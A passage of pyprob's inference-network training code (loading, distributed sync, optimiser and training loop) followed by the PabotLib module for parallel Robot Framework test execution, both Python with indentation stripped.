tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
tmp_file = os.path.join(tmp_dir, 'pyprob_inference_network')
tar.extract('pyprob_inference_network', tmp_dir)
tar.close()
if util._cuda_enabled:
data = torch.load(tmp_file)
else:
data = torch.load(tmp_file, map_location=lambda storage, loc: storage)
shutil.rmtree(tmp_dir)
except Exception as e:
print(e)
raise RuntimeError('Cannot load inference network.')
if data['pyprob_version'] != __version__:
warnings.warn('Different pyprob versions (loaded network: {}, current system: {})'.format(data['pyprob_version'], __version__))
if data['torch_version'] != torch.__version__:
warnings.warn('Different PyTorch versions (loaded network: {}, current system: {})'.format(data['torch_version'], torch.__version__))
ret = data['inference_network']
if util._cuda_enabled:
if ret._on_cuda:
if ret._device != util._device:
warnings.warn('Loading CUDA (device {}) network to CUDA (device {})'.format(ret._device, util._device))
else:
warnings.warn('Loading CPU network to CUDA (device {})'.format(util._device))
else:
if ret._on_cuda:
warnings.warn('Loading CUDA (device {}) network to CPU'.format(ret._device))
ret.to(device=util._device)
# For compatibility loading NNs saved before 0.13.2.dev2
if not hasattr(ret, '_distributed_train_loss'):
ret._distributed_train_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_valid_loss'):
ret._distributed_valid_loss = util.to_tensor(0.)
if not hasattr(ret, '_distributed_history_train_loss'):
ret._distributed_history_train_loss = []
if not hasattr(ret, '_distributed_history_train_loss_trace'):
ret._distributed_history_train_loss_trace = []
if not hasattr(ret, '_distributed_history_valid_loss'):
ret._distributed_history_valid_loss = []
if not hasattr(ret, '_distributed_history_valid_loss_trace'):
ret._distributed_history_valid_loss_trace = []
if not hasattr(ret, '_optimizer_state'):
ret._optimizer_state = None
if not hasattr(ret, '_learning_rate_scheduler_state'):
ret._learning_rate_scheduler_state = None
# For compatibility loading NNs saved before 0.13.2.dev5
if not hasattr(ret, '_total_train_traces_end'):
ret._total_train_traces_end = None
# For compatibility loading NNs saved before 0.13.2.dev6
if not hasattr(ret, '_loss_init'):
ret._loss_init = None
if not hasattr(ret, '_learning_rate_init'):
ret._learning_rate_init = 0
if not hasattr(ret, '_learning_rate_end'):
ret._learning_rate_end = 0
if not hasattr(ret, '_weight_decay'):
ret._weight_decay = 0
if not hasattr(ret, '_learning_rate_scheduler_type'):
ret._learning_rate_scheduler_type = None
ret._create_optimizer(ret._optimizer_state)
ret._create_lr_scheduler(ret._learning_rate_scheduler_state)
return ret
def to(self, device=None, *args, **kwargs):
self._device = device
self._on_cuda = 'cuda' in str(device)
super().to(device=device, *args, *kwargs)
def _pre_generate_layers(self, dataset, batch_size=64, save_file_name_prefix=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
self._layers_pre_generated = True
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=0, collate_fn=lambda x: Batch(x))
util.progress_bar_init('Layer pre-generation...', len(dataset), 'Traces')
i = 0
for i_batch, batch in enumerate(dataloader):
i += len(batch)
layers_changed = self._polymorph(batch)
util.progress_bar_update(i)
if layers_changed and (save_file_name_prefix is not None):
file_name = '{}_00000000_pre_generated.network'.format(save_file_name_prefix)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
util.progress_bar_end('Layer pre-generation complete')
def _distributed_sync_parameters(self):
""" broadcast rank 0 parameter to all ranks """
# print('Distributed training synchronizing parameters across nodes...')
for param in self.parameters():
dist.broadcast(param.data, 0)
def _distributed_sync_grad(self, world_size):
""" all_reduce grads from all ranks """
# print('Distributed training synchronizing gradients across nodes...')
# make a local map of all non-zero gradients
ttmap = util.to_tensor([1 if p.grad is not None else 0 for p in self.parameters()])
# get the global map of all non-zero gradients
pytorch_allreduce_supports_list = True
try:
dist.all_reduce([ttmap])
except:
pytorch_allreduce_supports_list = False
dist.all_reduce(ttmap)
gl = []
for i, param in enumerate(self.parameters()):
if param.grad is not None:
gl.append(param.grad.data)
elif ttmap[i]:
# someone else had a non-zero grad so make a local zero'd copy
param.grad = util.to_tensor(torch.zeros_like(param.data))
gl.append(param.grad.data)
# reduce all gradients used by at least one rank
if pytorch_allreduce_supports_list:
dist.all_reduce(gl)
else:
for g in gl:
dist.all_reduce(g)
# average them
for li in gl:
li /= float(world_size)
def _distributed_update_train_loss(self, loss, world_size):
self._distributed_train_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_train_loss)
self._distributed_train_loss /= float(world_size)
self._distributed_history_train_loss.append(float(self._distributed_train_loss))
self._distributed_history_train_loss_trace.append(self._total_train_traces)
return self._distributed_train_loss
def _distributed_update_valid_loss(self, loss, world_size):
self._distributed_valid_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_valid_loss)
self._distributed_valid_loss /= float(world_size)
self._distributed_history_valid_loss.append(float(self._distributed_valid_loss))
self._distributed_history_valid_loss_trace.append(self._total_train_traces)
return self._distributed_valid_loss
def _create_optimizer(self, state_dict=None):
if self._optimizer_type is None: # happens when loading pre-generated network
return
# print('Creating new optimizer')
if self._optimizer_type in [Optimizer.ADAM, Optimizer.ADAM_LARC]:
self._optimizer = optim.Adam(self.parameters(), lr=self._learning_rate_init, weight_decay=self._weight_decay)
else: # optimizer_type in [Optimizer.SGD, Optimizer.SGD_LARC]
self._optimizer = optim.SGD(self.parameters(), lr=self._learning_rate_init, momentum=self._momentum, nesterov=True, weight_decay=self._weight_decay)
if self._optimizer_type in [Optimizer.ADAM_LARC, Optimizer.SGD_LARC]:
self._optimizer = LARC(self._optimizer)
if state_dict is not None:
# print('Setting optimizer state')
self._optimizer.load_state_dict(state_dict)
def _create_lr_scheduler(self, state_dict=None):
if self._learning_rate_scheduler_type is None: # happens when loading pre-generated network
return
# print('Creating new learning rate scheduler')
learning_rate_scheduler_type = self._learning_rate_scheduler_type
iter_end = self._total_train_traces_end
lr_init = self._learning_rate_init
lr_end = self._learning_rate_end
def _poly_decay(iter, power):
return (lr_init - lr_end) * ((1 - iter/iter_end) ** power) + lr_end
if self._optimizer is None:
self._learning_rate_scheduler = None
elif learning_rate_scheduler_type == LearningRateScheduler.POLY1:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=1.) / lr_init)
elif learning_rate_scheduler_type == LearningRateScheduler.POLY2:
self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=2.) / lr_init)
else:
self._learning_rate_scheduler = None
if self._learning_rate_scheduler is not None and state_dict is not None:
# print('Setting learning rate scheduler state')
self._learning_rate_scheduler.load_state_dict(state_dict)
def optimize(self, num_traces, dataset, dataset_valid=None, num_traces_end=1e9, batch_size=64, valid_every=None, optimizer_type=Optimizer.ADAM, learning_rate_init=0.0001, learning_rate_end=1e-6, learning_rate_scheduler_type=LearningRateScheduler.NONE, momentum=0.9, weight_decay=1e-5, save_file_name_prefix=None, save_every_sec=600, distributed_backend=None, distributed_params_sync_every_iter=10000, distributed_num_buckets=10, dataloader_offline_num_workers=0, stop_with_bad_loss=False, log_file_name=None):
if not self._layers_initialized:
self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
self._init_layers()
self._layers_initialized = True
if distributed_backend is None:
distributed_world_size = 1
distributed_rank = 0
else:
dist.init_process_group(backend=distributed_backend)
distributed_world_size = dist.get_world_size()
distributed_rank = dist.get_rank()
self._distributed_backend = distributed_backend
self._distributed_world_size = distributed_world_size
# Training data loader
if isinstance(dataset, OfflineDataset):
if distributed_world_size == 1:
dataloader = DataLoader(dataset, batch_sampler=TraceBatchSampler(dataset, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_sampler=DistributedTraceBatchSampler(dataset, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=0, collate_fn=lambda x: Batch(x))
# Validation data loader
if dataset_valid is not None:
if distributed_world_size == 1:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=TraceBatchSampler(dataset_valid, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
else:
dataloader_valid = DataLoader(dataset_valid, batch_sampler=DistributedTraceBatchSampler(dataset_valid, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
if not self._layers_pre_generated:
for i_batch, batch in enumerate(dataloader_valid):
self._polymorph(batch)
if distributed_world_size > 1:
util.init_distributed_print(distributed_rank, distributed_world_size, False)
if distributed_rank == 0:
print(colored('Distributed synchronous training', 'yellow', attrs=['bold']))
print(colored('Distributed backend : {}'.format(distributed_backend), 'yellow', attrs=['bold']))
print(colored('Distributed world size : {}'.format(distributed_world_size), 'yellow', attrs=['bold']))
print(colored('Distributed minibatch size : {} (global effective), {} (per rank)'.format(batch_size * distributed_world_size, batch_size), 'yellow', attrs=['bold']))
print(colored('Distributed init.learn rate: {} (global), {} (base)'.format(learning_rate_init * math.sqrt(distributed_world_size), learning_rate_init), 'yellow', attrs=['bold']))
print(colored('Distributed optimizer : {}'.format(str(optimizer_type)), 'yellow', attrs=['bold']))
print(colored('Distributed dataset size : {:,}'.format(len(dataset)), 'yellow', attrs=['bold']))
print(colored('Distributed num. buckets : {:,}'.format(len(dataloader.batch_sampler._buckets)), 'yellow', attrs=['bold']))
# bucket_size = math.ceil((len(dataset) / batch_size) / distributed_num_buckets)
# print(colored('Distributed bucket size : {:,} minibatches ({:,} traces)'.format(bucket_size, bucket_size * batch_size), 'yellow', attrs=['bold']))
self.train()
prev_total_train_seconds = self._total_train_seconds
time_start = time.time()
time_loss_min = time_start
time_last_batch = time_start
if valid_every is None:
valid_every = max(100, num_traces / 1000)
last_validation_trace = -valid_every + 1
valid_loss = 0
if self._optimizer_type is None:
self._optimizer_type = optimizer_type
if self._momentum is None:
self._momentum = momentum
if self._weight_decay is None:
self._weight_decay = weight_decay
if self._learning_rate_scheduler_type is None:
self._learning_rate_scheduler_type = learning_rate_scheduler_type
if self._learning_rate_init is None:
self._learning_rate_init = learning_rate_init * math.sqrt(distributed_world_size)
if self._learning_rate_end is None:
self._learning_rate_end = learning_rate_end
if self._total_train_traces_end is None:
self._total_train_traces_end = num_traces_end
epoch = 0
trace = 0
stop = False
print('Train. time | Epoch| Trace | Init. loss| Min. loss | Curr. loss| T.since min | Learn.rate| Traces/sec')
max_print_line_len = 0
loss_min_str = ''
time_since_loss_min_str = ''
loss_init_str = '' if self._loss_init is None else '{:+.2e}'.format(self._loss_init)
if save_every_sec is not None:
last_auto_save_time = time_start - save_every_sec
last_print = time_start - util._print_refresh_rate
if (distributed_rank == 0) and log_file_name is not None:
log_file = open(log_file_name, mode='w', buffering=1)
log_file.write('time, iteration, trace, loss, valid_loss, learning_rate, mean_trace_length_controlled, sub_mini_batches, distributed_bucket_id, traces_per_second\n')
while not stop:
epoch += 1
for i_batch, batch in enumerate(dataloader):
time_batch = time.time()
# Important, a self._distributed_sync_parameters() needs to happen at the very beginning of a training
if (distributed_world_size > 1) and (self._total_train_iterations % distributed_params_sync_every_iter == 0):
self._distributed_sync_parameters()
if self._layers_pre_generated: # and (distributed_world_size > 1):
layers_changed = False
else:
layers_changed = self._polymorph(batch)
if (self._optimizer is None) or layers_changed:
self._create_optimizer()
self._create_lr_scheduler()
# print(self._optimizer.state[self._optimizer.param_groups[0]['params'][0]])
self._optimizer.zero_grad()
success, loss = self._loss(batch)
if not success:
print(colored('Cannot compute loss, skipping batch. Loss: {}'.format(loss), 'red', attrs=['bold']))
if stop_with_bad_loss:
return
else:
loss.backward()
if distributed_world_size > 1:
self._distributed_sync_grad(distributed_world_size)
self._optimizer.step()
loss = float(loss)
if (distributed_world_size > 1):
loss = self._distributed_update_train_loss(loss, distributed_world_size)
if self._loss_init is None:
self._loss_init = loss
self._loss_max = loss
loss_init_str = '{:+.2e}'.format(self._loss_init)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
if loss < self._loss_min:
self._loss_min = loss
loss_str = colored('{:+.2e}'.format(loss), 'green', attrs=['bold'])
loss_min_str = colored('{:+.2e}'.format(self._loss_min), 'green', attrs=['bold'])
time_loss_min = time_batch
time_since_loss_min_str = colored(util.days_hours_mins_secs_str(0), 'green', attrs=['bold'])
elif loss > self._loss_max:
self._loss_max = loss
loss_str = colored('{:+.2e}'.format(loss), 'red', attrs=['bold'])
# loss_max_str = colored('{:+.3e}'.format(self._loss_max), 'red', attrs=['bold'])
else:
if loss < self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'green')
elif loss > self._loss_previous:
loss_str = colored('{:+.2e}'.format(loss), 'red')
else:
loss_str = '{:+.2e}'.format(loss)
loss_min_str = '{:+.2e}'.format(self._loss_min)
# loss_max_str = '{:+.3e}'.format(self._loss_max)
time_since_loss_min_str = util.days_hours_mins_secs_str(time_batch - time_loss_min)
self._loss_previous = loss
self._total_train_iterations += 1
trace += batch.size * distributed_world_size
self._total_train_traces += batch.size * distributed_world_size
self._total_train_seconds = prev_total_train_seconds + (time_batch - time_start)
self._history_train_loss.append(loss)
self._history_train_loss_trace.append(self._total_train_traces)
traces_per_second = batch.size * distributed_world_size / (time_batch - time_last_batch)
if dataset_valid is not None:
if trace - last_validation_trace > valid_every:
print('\nComputing validation loss')
valid_loss = 0
with torch.no_grad():
for i_batch, batch in enumerate(dataloader_valid):
_, v = self._loss(batch)
valid_loss += v
valid_loss = float(valid_loss) / (len(dataloader_valid) / distributed_world_size)
if distributed_world_size > 1:
valid_loss = self._distributed_update_valid_loss(valid_loss, distributed_world_size)
self._history_valid_loss.append(valid_loss)
self._history_valid_loss_trace.append(self._total_train_traces)
last_validation_trace = trace - 1
if (distributed_rank == 0) and (save_file_name_prefix is not None) and (save_every_sec is not None):
if time_batch - last_auto_save_time > save_every_sec:
last_auto_save_time = time_batch
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
time_last_batch = time_batch
if trace >= num_traces:
print('\nStop condition reached. num_traces: {}'.format(num_traces))
stop = True
if self._total_train_traces >= self._total_train_traces_end:
print(colored('\nStop condition reached. num_traces_end set during network generation: {}'.format(self._total_train_traces_end), 'red', attrs=['bold']))
if self._learning_rate_scheduler is not None:
warnings.warn('Continuing training with learning rate scheduler beyond num_traces_end, make sure this is intended'.format(self._total_train_traces_end))
# stop = True
if self._learning_rate_scheduler is not None:
self._learning_rate_scheduler.step(self._total_train_traces) # Gives a DeprecationWarning with PyTorch 1.4.0
learning_rate_current = self._optimizer.param_groups[0]['lr']
learning_rate_current_str = '{:+.2e}'.format(learning_rate_current)
if (time_batch - last_print > util._print_refresh_rate) or stop:
last_print = time_batch
total_training_seconds_str = util.days_hours_mins_secs_str(self._total_train_seconds)
epoch_str = '{:4}'.format('{:,}'.format(epoch))
total_train_traces_str = '{:9}'.format('{:,}'.format(self._total_train_traces))
traces_per_second_str = '{:,.1f}'.format(traces_per_second)
print_line = '{} | {} | {} | {} | {} | {} | {} | {} | {} '.format(total_training_seconds_str, epoch_str, total_train_traces_str, loss_init_str, loss_min_str, loss_str, time_since_loss_min_str, learning_rate_current_str, traces_per_second_str)
max_print_line_len = max(len(print_line), max_print_line_len)
print(print_line.ljust(max_print_line_len), end='\r')
sys.stdout.flush()
if (distributed_rank == 0) and log_file_name is not None:
bucket_id = None
if isinstance(dataloader.batch_sampler, DistributedTraceBatchSampler):
bucket_id = dataloader.batch_sampler._current_bucket_id
log_file.write('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}\n'.format(self._total_train_seconds, self._total_train_iterations, self._total_train_traces, loss, valid_loss, learning_rate_current, batch.mean_length_controlled, len(batch.sub_batches), bucket_id, traces_per_second))
if stop:
break
if (distributed_rank == 0) and log_file_name is not None:
log_file.close()
print()
if (distributed_rank == 0) and (save_file_name_prefix is not None):
file_name = '{}_{}_traces_{}.network'.format(save_file_name_prefix, util.get_time_stamp(), self._total_train_traces)
print('\rSaving to disk... ', end='\r')
self._save(file_name)
|
pabotlib.py | # Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from robot.errors import RobotError
try:
import configparser # type: ignore
except:
import ConfigParser as configparser # type: ignore
# Support Python 2
from robot.libraries.BuiltIn import BuiltIn
from .robotremoteserver import RobotRemoteServer
from robot.libraries.Remote import Remote
from robot.running import TestLibrary
from robot.api import logger
import threading
import time
from typing import List, Dict, Tuple, Set, Optional, Any
PABOT_LAST_LEVEL = "PABOTLASTLEVEL"
PABOT_QUEUE_INDEX = "PABOTQUEUEINDEX"
PABOT_LAST_EXECUTION_IN_POOL = "PABOTISLASTEXECUTIONINPOOL"
PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE = "pabot_min_queue_index_executing"
class _PabotLib(object):
_TAGS_KEY = "tags"
def __init__(self, resourcefile=None): # type: (Optional[str]) -> None
self._locks = {} # type: Dict[str, Tuple[str, int]]
self._owner_to_values = {} # type: Dict[str, Dict[str, object]]
self._parallel_values = {} # type: Dict[str, object]
self._remote_libraries = {} # type: Dict[str, Tuple[int, RobotRemoteServer, threading.Thread]]
self._values = self._parse_values(resourcefile)
self._added_suites = [] # type: List[Tuple[str, List[str]]]
self._ignored_executions = set() # type: Set[str]
def _parse_values(self, resourcefile): # type: (Optional[str]) -> Dict[str, Dict[str, Any]]
vals = {} # type: Dict[str, Dict[str, Any]]
if resourcefile is None:
return vals
conf = configparser.ConfigParser()
conf.read(resourcefile)
for section in conf.sections():
vals[section] = dict((k, conf.get(section, k))
for k in conf.options(section))
for section in vals:
if self._TAGS_KEY in vals[section]:
vals[section][self._TAGS_KEY] = [t.strip() for t in vals[section][self._TAGS_KEY].split(",")]
else:
vals[section][self._TAGS_KEY] = []
return vals
def set_parallel_value_for_key(self, key, value): # type: (str, object) -> None
self._parallel_values[key] = value
def get_parallel_value_for_key(self, key): # type: (str) -> object
return self._parallel_values.get(key, "")
def acquire_lock(self, name, caller_id): # type: (str, str) -> bool
if name in self._locks and caller_id != self._locks[name][0]:
return False
if name not in self._locks:
self._locks[name] = (caller_id, 0)
self._locks[name] = (caller_id, self._locks[name][1] + 1)
return True
def release_lock(self, name, caller_id): # type: (str, str) -> None
assert self._locks[name][0] == caller_id
self._locks[name] = (caller_id, self._locks[name][1] - 1)
if self._locks[name][1] == 0:
del self._locks[name]
def release_locks(self, caller_id):
# type: (str) -> None
for key in list(self._locks.keys()):
if self._locks[key][0] == caller_id:
self._locks[key] = (caller_id, self._locks[key][1] - 1)
if self._locks[key][1] == 0:
del self._locks[key]
def acquire_value_set(self, caller_id, *tags):
if not self._values:
raise AssertionError(
'Value set cannot be aquired. It was never imported or all are disabled. Use --resourcefile option to import.')
# CAN ONLY RESERVE ONE VALUE SET AT A TIME
if caller_id in self._owner_to_values and self._owner_to_values[caller_id] is not None:
raise ValueError("Caller has already reserved a value set.")
matching = False
for valueset_key in self._values:
if all(tag in self._values[valueset_key][self._TAGS_KEY] for tag in tags):
matching = True
if self._values[valueset_key] not in self._owner_to_values.values():
self._owner_to_values[caller_id] = self._values[valueset_key]
return (valueset_key, self._values[valueset_key])
if not matching:
raise ValueError("No value set matching given tags exists.")
# This return value is for situations where no set could be reserved
# and the caller needs to wait until one is free.
return (None, None)
def release_value_set(self, caller_id): # type: (str) -> None
if caller_id not in self._owner_to_values:
return
del self._owner_to_values[caller_id]
def disable_value_set(self, setname, caller_id): # type: (str, str) -> None
del self._owner_to_values[caller_id]
del self._values[setname]
def get_value_from_set(self, key, caller_id): # type: (str, str) -> object
if caller_id not in self._owner_to_values:
raise AssertionError('No value set reserved for caller process')
if key not in self._owner_to_values[caller_id]:
raise AssertionError('No value for key "%s"' % key)
return self._owner_to_values[caller_id][key]
def import_shared_library(self, name): # type: (str) -> int
if name in self._remote_libraries:
return self._remote_libraries[name][0]
imported = TestLibrary(name)
server = RobotRemoteServer(imported.get_instance(), port=0, serve=False, allow_stop=True)
server_thread = threading.Thread(target=server.serve)
server_thread.start()
time.sleep(1)
port = server.server_port
self._remote_libraries[name] = (port, server, server_thread)
return port
def add_suite_to_execution_queue(self, suitename, variables): # type: (str, List[str]) -> None
self._added_suites.append((suitename, variables or []))
def get_added_suites(self): # type: () -> List[Tuple[str, List[str]]]
added_suites = self._added_suites
self._added_suites = []
return added_suites
def ignore_execution(self, caller_id): # type: (str) -> None
self._ignored_executions.add(caller_id)
def is_ignored_execution(self, caller_id): # type: (str) -> bool
return caller_id in self._ignored_executions
def stop_remote_libraries(self):
for name in self._remote_libraries:
self._remote_libraries[name][1].stop_remote_server()
for name in self._remote_libraries:
self._remote_libraries[name][2].join()
class PabotLib(_PabotLib):
__version__ = 0.67
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LISTENER_API_VERSION = 2
_pollingSeconds_SetupTeardown = 0.3
_pollingSeconds = 0.1
_polling_logging = True
def __init__(self):
_PabotLib.__init__(self)
self.__remotelib = None
self.__my_id = None
self._valueset = None
self._setname = None
self.ROBOT_LIBRARY_LISTENER = self
self._position = [] # type: List[str]
self._row_index = 0
def _start(self, name, attributes):
self._position.append(attributes["longname"])
def _end(self, name, attributes):
self._position = self._position[:-1] if len(self._position) > 1 else [attributes["longname"][:-len(name)-1]]
def _start_keyword(self, name, attributes):
if not(self._position):
self._position = ['0', '0.' + str(self._row_index)]
else:
self._position.append(self._position[-1] + "." + str(self._row_index))
self._row_index = 0
def _end_keyword(self, name, attributes):
if not(self._position):
self._row_index = 1
self._position = ['0']
return
splitted = self._position[-1].split(".")
self._row_index = int(splitted[-1]) if len(splitted) > 1 else 0
self._row_index += 1
self._position = self._position[:-1] if len(self._position) > 1 else [str(int(splitted[0])+1)]
_start_suite = _start_test = _start
_end_suite = _end_test = _end
def _close(self):
try:
self.release_locks()
self.release_value_set()
except RuntimeError as err:
# This is just last line of defence
# Ignore connection errors if library server already closed
logger.console("pabot.PabotLib#_close: threw an exception: is --pabotlib flag used? ErrorDetails: {0}".format(repr(err)), stream='stderr')
pass
@property
def _path(self):
if len(self._position) < 1:
return ""
return self._position[-1]
@property
def _my_id(self):
if self.__my_id is None:
my_id = BuiltIn().get_variable_value('${CALLER_ID}')
logger.debug('Caller ID is %r' % my_id)
self.__my_id = my_id if my_id else None
return self.__my_id
@property
def _remotelib(self):
if self.__remotelib is None:
uri = BuiltIn().get_variable_value('${PABOTLIBURI}')
logger.debug('PabotLib URI %r' % uri)
self.__remotelib = Remote(uri) if uri else None
return self.__remotelib
def set_polling_seconds(self, secs):
"""
Determine the amount of seconds to wait between checking for free locks. Default: 0.1 (100ms)
"""
PabotLib._pollingSeconds = secs
def set_polling_seconds_setupteardown(self, secs):
"""
Determine the amount of seconds to wait between checking for free locks during setup and teardown. Default: 0.3 (300ms)
"""
PabotLib._pollingSeconds_SetupTeardown = secs
def set_polling_logging(self, enable):
"""
Enable or disable logging inside of polling. Logging inside of polling can be disabled (enable=False) to reduce log file size.
"""
if isinstance(enable,str): enable = (enable.lower()=='true')
PabotLib._polling_logging = bool(enable)
def run_setup_only_once(self, keyword, *args):
"""
Runs a keyword only once at the first possible moment when
an execution has gone through this step.
[https://pabot.org/PabotLib.html?ref=log#run-setup-only-once|Open online docs.]
"""
lock_name = 'pabot_setup_%s' % self._path
try:
self.acquire_lock(lock_name)
passed = self.get_parallel_value_for_key(lock_name)
if passed != '':
if passed == 'FAILED':
raise AssertionError('Setup failed in other process')
logger.info("Setup skipped in this item")
return
BuiltIn().run_keyword(keyword, *args)
self.set_parallel_value_for_key(lock_name, 'PASSED')
except:
self.set_parallel_value_for_key(lock_name, 'FAILED')
raise
finally:
self.release_lock(lock_name)
def run_only_once(self, keyword):
"""
Runs a keyword only once in one of the parallel processes.
[https://pabot.org/PabotLib.html?ref=log#run-only-once|Open online docs.]
"""
lock_name = 'pabot_run_only_once_%s' % keyword
try:
self.acquire_lock(lock_name)
passed = self.get_parallel_value_for_key(lock_name)
if passed != '':
if passed == 'FAILED':
raise AssertionError('Keyword failed in other process')
logger.info("Skipped in this item")
return
BuiltIn().run_keyword(keyword)
self.set_parallel_value_for_key(lock_name, 'PASSED')
except:
self.set_parallel_value_for_key(lock_name, 'FAILED')
raise
finally:
self.release_lock(lock_name)
def run_teardown_only_once(self, keyword, *args):
"""
Runs a keyword only once after all executions have gone throught this step in the last possible moment.
[https://pabot.org/PabotLib.html?ref=log#run-teardown-only-once|Open online docs.]
"""
last_level = BuiltIn().get_variable_value('${%s}' % PABOT_LAST_LEVEL)
if last_level is None:
BuiltIn().run_keyword(keyword, *args)
return
logger.trace('Current path "%s" and last level "%s"' % (self._path, last_level))
if not self._path.startswith(last_level):
logger.info("Teardown skipped in this item")
return
queue_index = int(BuiltIn().get_variable_value('${%s}' % PABOT_QUEUE_INDEX) or 0)
logger.trace("Queue index (%d)" % queue_index)
if self._remotelib:
while self.get_parallel_value_for_key(PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE) < queue_index:
if PabotLib._polling_logging: logger.trace(self.get_parallel_value_for_key(PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE))
time.sleep(PabotLib._pollingSeconds_SetupTeardown)
logger.trace("Teardown conditions met. Executing keyword.")
BuiltIn().run_keyword(keyword, *args)
def run_on_last_process(self, keyword):
"""
Runs a keyword only on last process used by pabot.
[https://pabot.org/PabotLib.html?ref=log#run-on-last-process|Open online docs.]
"""
is_last = int(BuiltIn().get_variable_value('${%s}' % PABOT_LAST_EXECUTION_IN_POOL) or 1) == 1
if not is_last:
logger.info("Skipped in this item")
return
queue_index = int(BuiltIn().get_variable_value('${%s}' % PABOT_QUEUE_INDEX) or 0)
if queue_index > 0 and self._remotelib:
while self.get_parallel_value_for_key('pabot_only_last_executing') != 1:
time.sleep(PabotLib._pollingSeconds_SetupTeardown)
BuiltIn().run_keyword(keyword)
def set_parallel_value_for_key(self, key, value):
"""
Set a globally available key and value that can be accessed
from all the pabot processes.
[https://pabot.org/PabotLib.html?ref=log#set-parallel-value-for-key|Open online docs.]
"""
self._run_with_lib('set_parallel_value_for_key', key, value)
def _run_with_lib(self, keyword, *args):
if self._remotelib:
try:
return self._remotelib.run_keyword(keyword, args, {})
except RuntimeError as err:
logger.error("RuntimeError catched in remotelib keyword execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
self.__remotelib = None
raise
return getattr(_PabotLib, keyword)(self, *args)
def add_suite_to_execution_queue(self, suitename, *variables):
self._run_with_lib('add_suite_to_execution_queue', suitename, variables)
def get_parallel_value_for_key(self, key):
"""
Get the value for a key. If there is no value for the key then empty
string is returned.
[https://pabot.org/PabotLib.html?ref=log#get-parallel-value-for-key|Open online docs.]
"""
return self._run_with_lib('get_parallel_value_for_key', key)
def acquire_lock(self, name):
"""
Wait for a lock with name.
[https://pabot.org/PabotLib.html?ref=log#acquire-lock|Open online docs.]
"""
if self._remotelib:
try:
while not self._remotelib.run_keyword('acquire_lock',
[name, self._my_id], {}):
time.sleep(PabotLib._pollingSeconds)
if PabotLib._polling_logging: logger.debug('waiting for lock to release')
return True
except RuntimeError as err:
logger.error("RuntimeError catched in remote acquire_lock execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
self.__remotelib = None
raise
return _PabotLib.acquire_lock(self, name, self._my_id)
def release_lock(self, name):
"""
Release a lock with name.
[https://pabot.org/PabotLib.html?ref=log#release-lock|Open online docs.]
"""
self._run_with_lib('release_lock', name, self._my_id)
def release_locks(self):
"""
Release all locks called by instance.
[https://pabot.org/PabotLib.html?ref=log#release-locks|Open online docs.]
"""
self._run_with_lib('release_locks', self._my_id)
def acquire_value_set(self, *tags):
"""
Reserve a set of values for this execution.
[https://pabot.org/PabotLib.html?ref=log#acquire-value-set|Open online docs.]
"""
setname = self._acquire_value_set(*tags)
if setname is None:
raise ValueError("Could not aquire a value set")
return setname
def _acquire_value_set(self, *tags):
if self._remotelib:
try:
while True:
self._setname, self._valueset = self._remotelib.run_keyword('acquire_value_set',
[self._my_id]+list(tags), {})
if self._setname:
logger.info('Value set "%s" acquired' % self._setname)
return self._setname
time.sleep(PabotLib._pollingSeconds)
if PabotLib._polling_logging: logger.debug('waiting for a value set')
except RuntimeError as err:
logger.error("RuntimeError catched in remote _acquire_value_set execution. Maybe there is no connection - is pabot called with --pabotlib option? ErrorDetails: {0}".format(repr(err)))
self.__remotelib = None
raise
self._setname, self._valueset = _PabotLib.acquire_value_set(self, self._my_id, *tags)
return self._setname
def get_value_from_set(self, key):
"""
Get a value from previously reserved value set.
[https://pabot.org/PabotLib.html?ref=log#get-value-from-set|Open online docs.]
"""
if self._valueset is None:
raise AssertionError('No value set reserved for caller process')
key = key.lower()
if key not in self._valueset:
raise AssertionError('No value for key "%s"' % key)
return self._valueset[key]
def ignore_execution(self):
self._run_with_lib('ignore_execution', self._my_id)
error = RobotError('Ignore')
error.ROBOT_EXIT_ON_FAILURE = True
